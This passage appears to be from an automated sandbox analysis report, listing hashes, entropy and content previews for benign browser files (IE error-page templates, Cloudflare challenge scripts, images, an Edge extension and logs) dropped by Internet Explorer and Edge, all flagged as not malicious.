                                                                                                                                              Size (bytes):24051
                                                                                                                                              Entropy (8bit):4.941039417164537
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:VuR/6okgTQwq23gGM8lUR9YRGQ2BwoX6zp+1+nDT1FvxKSI7/UsV7MSE6XZ2dKzk:JwV+oUcoQJpdf1dxKSI7/Ue7ZX2qk
                                                                                                                                              MD5:5E8C69A459A691B5D1B9BE442332C87D
                                                                                                                                              SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                                                                                                                                              SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                                                                                                                                              SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w
                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4592
                                                                                                                                              Entropy (8bit):4.048313890192413
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:upUw1V4VOBXvLuSZIPTC5f1a5TI7jn3GFa7KGuc1kpNc7K1rfQy:u3pfZQw6Kj36a7gG7I
                                                                                                                                              MD5:75296BC561EEB0FCD4F55BA9769AD14A
                                                                                                                                              SHA1:394EB8464D5C2AC69A3E6F7DF0D747BC3DA5CED3
                                                                                                                                              SHA-256:71165196DA9A0BE1A5CA6BF2D5C158E2F6792DBD9E6517BA7BD471E064047B60
                                                                                                                                              SHA-512:FBAE90CBBC552A3ABAE1D53A697CC0173CA74AC1032A267168BCF3C93C311BBFD123DFB52CE92BF651AB05A02207926D06C2F3607107955F53F1C5FB6A994229
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html>.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css" />.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>.... <title>HTTP 403 Forbidden</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Information icon">.. </
                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4113
                                                                                                                                              Entropy (8bit):7.9370830126943375
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                              MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                              SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                              SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                              SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):100625
                                                                                                                                              Entropy (8bit):5.870996751389833
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:8Og7G2E8B1tB4dOp2Z4ozE2xCGyFnJkM0/pvRRuAbOgc:8O4GGozjxCGI70Rm
                                                                                                                                              MD5:5EE07A46C1432CE88BDB017B96CDCDF8
                                                                                                                                              SHA1:0D8022206A4F8E32AE158208B3F48F54EFBBCCAB
                                                                                                                                              SHA-256:81FE41F6B33842CB7AAB8C788DD66B4D3B328075D10A6537341AF3ED5A9EB9ED
                                                                                                                                              SHA-512:A4965B68BE0D3A842C90D675806F1DD8A32A0E25C342F4C09753B7D1B45CCEB3ACEAE8AE291005FFCDD3624E07462845185A1F52668C83948F7731A0CC601065
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:window._cf_chl_opt.uaO=true;window._cf_chl_opt.uaSR=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"success_title":"Verification%20successful","favicon_alt":"Icon%20for%20%25%7Bplaceholder.com%7D","location_mismatch_warning_aux":"The%20address%20to%20the%20requested%20website%20has%20changed%20and%20is%20not%20accessible.%20Try%20a%20different%20link%20to%20get%20to%20the%20desired%20page%20or%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","time_check_cached_warning_aux":"%3Ca%20class%3D%22refresh_link%22%3ERefresh%20the%20page%3C%2Fa%3E%20to%20try%20again.%20If%20the%20issue%20persists%20attempt%20a%20different%20link%20to%20get%20to%20the%20desired%20page.%20Alternatively%2C%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","redirecting_text":"Waiting%20for%20%25%7Bplaceholder.com
                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):19948
                                                                                                                                              Entropy (8bit):5.261902742187293
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:XriNpnjyMkg8XMtExRN1w29JIOzahXtO2nJ65:GijgSWuanfJ65
                                                                                                                                              MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                                                                                              SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                                                                                              SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
                                                                                                                                              SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):748
                                                                                                                                              Entropy (8bit):7.249606135668305
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                              MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                              SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                              SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                              SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4722
                                                                                                                                              Entropy (8bit):5.16192639844512
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g5O8b7A9I5:JsUOG1yNlX6ZzWpHOo/iP16CbM1k
                                                                                                                                              MD5:387B4FC78ABB97F378C5299D4D2CE305
                                                                                                                                              SHA1:6F2995FC620AB520C9EE1CA7244DF57367F983A2
                                                                                                                                              SHA-256:030209A13E2C84118139ABF0C4F08DBD203B4C802C7B73B74851860D79DF9CB7
                                                                                                                                              SHA-512:592D5E3FB7C78420F648281D87B0B303773749B8E0D3621A493ACAE257E2C1E77B782F3D6DAA0C2B3D37CBB4865B382617AF744E34F66C0F3E522DBCA7D71AAE
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.//Split out for louserzation...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, components 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):453
                                                                                                                                              Entropy (8bit):5.019973044227213
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                              MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                              SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                              SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                              SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12105
                                                                                                                                              Entropy (8bit):5.451485481468043
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                              MD5:9234071287E637F85D721463C488704C
                                                                                                                                              SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                              SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                              SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2168
                                                                                                                                              Entropy (8bit):5.207912016937144
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                              MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                              SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                              SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                              SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):447
                                                                                                                                              Entropy (8bit):7.304718288205936
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                              MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                              SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                              SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                              SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49120
                                                                                                                                              Entropy (8bit):0.0017331682157558962
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Ztt:T
                                                                                                                                              MD5:0392ADA071EB68355BED625D8F9695F3
                                                                                                                                              SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                                                                                                                              SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                                                                                                                              SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1
                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1
                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):154477
                                                                                                                                              Entropy (8bit):7.835886983924039
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                              MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                              SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                              SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                              SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):89
                                                                                                                                              Entropy (8bit):4.446561056962625
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:oVXQOUbEWlchdH8JOGXnAOUbEWlch6Fovn:o9QO/WGhdHqAO/WGhnv
                                                                                                                                              MD5:BF9F6C2EBC15023404F2CED55A4DB887
                                                                                                                                              SHA1:DF19C589CB9ACAFF9E799A68D914715E0BA56315
                                                                                                                                              SHA-256:CD91D1FBED81342C36839AF5C3EF76F90F2E503B78A59AC4D046EC500EA305BF
                                                                                                                                              SHA-512:7777AA3B6D35537293F6647092BCF3334D69AD6D505DA1AB0EACD5B08A84C221C400450D6D76FA6868C63456F2309EB56D4448FCC0F868F1EE37E18B9697B096
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[2025/01/03 11:33:33.977] Latest deploy version: ..[2025/01/03 11:33:33.977] 11.381.2 ..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1420
                                                                                                                                              Entropy (8bit):5.397149753098279
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:YemMjYJ52mMtmZ52mMRb0VA0I+dt50qC0yZRj05NsP07F6L51P0iCS6wX5TNM0iQ:YIE5QwZ5Q50i0Im50l0yZ505NsP07F6d
                                                                                                                                              MD5:EA462BDC60CFB994F45B60984F571E5C
                                                                                                                                              SHA1:85D76860D68971A0E3A72D38D270E4D0DCA76FDE
                                                                                                                                              SHA-256:1005DB38EF7E1E3133649243D6BA31C90223FC8998119D7582D8E4896E03CAB1
                                                                                                                                              SHA-512:CF54E6834FE8D779B059D2595C8CAF4B6E137B0030FFBE444A5DD75CF88CD315BB659006CE6AAACB35D45EC87D57626D7D00BCFD22535E30D9C6FDF7242B3ED8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"logTime": "1006/090722", "correlationVector":"rmkayOhJfEabcRCB2/Bp31","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/090722", "correlationVector":"jqHPV/yTVN5KYgOfDN/5Rr","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/090722", "correlationVector":"25C1A0EE3BD244A1BB83CF2641B12F1A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1006/093120", "correlationVector":"a/GaihlkzouX6tpAQ3civy","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/093121", "correlationVector":"2831F27CA5B645488E2DF2452C16A59E","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1006/093243", "correlationVector":"7DhT8FK3VbHYWFgub0ZtsN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/093243", "correlationVector":"83EFC8979E1A419495133BAFAFA5A23F","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1006/093745", "correlationVector":"Bxyvid0fodNJ7Wehc/BC7P","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/093746", "correlationVector":"B1516CBB
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):31335
                                                                                                                                              Entropy (8bit):7.694019108205432
                                                                                                                                              Encrypted:false
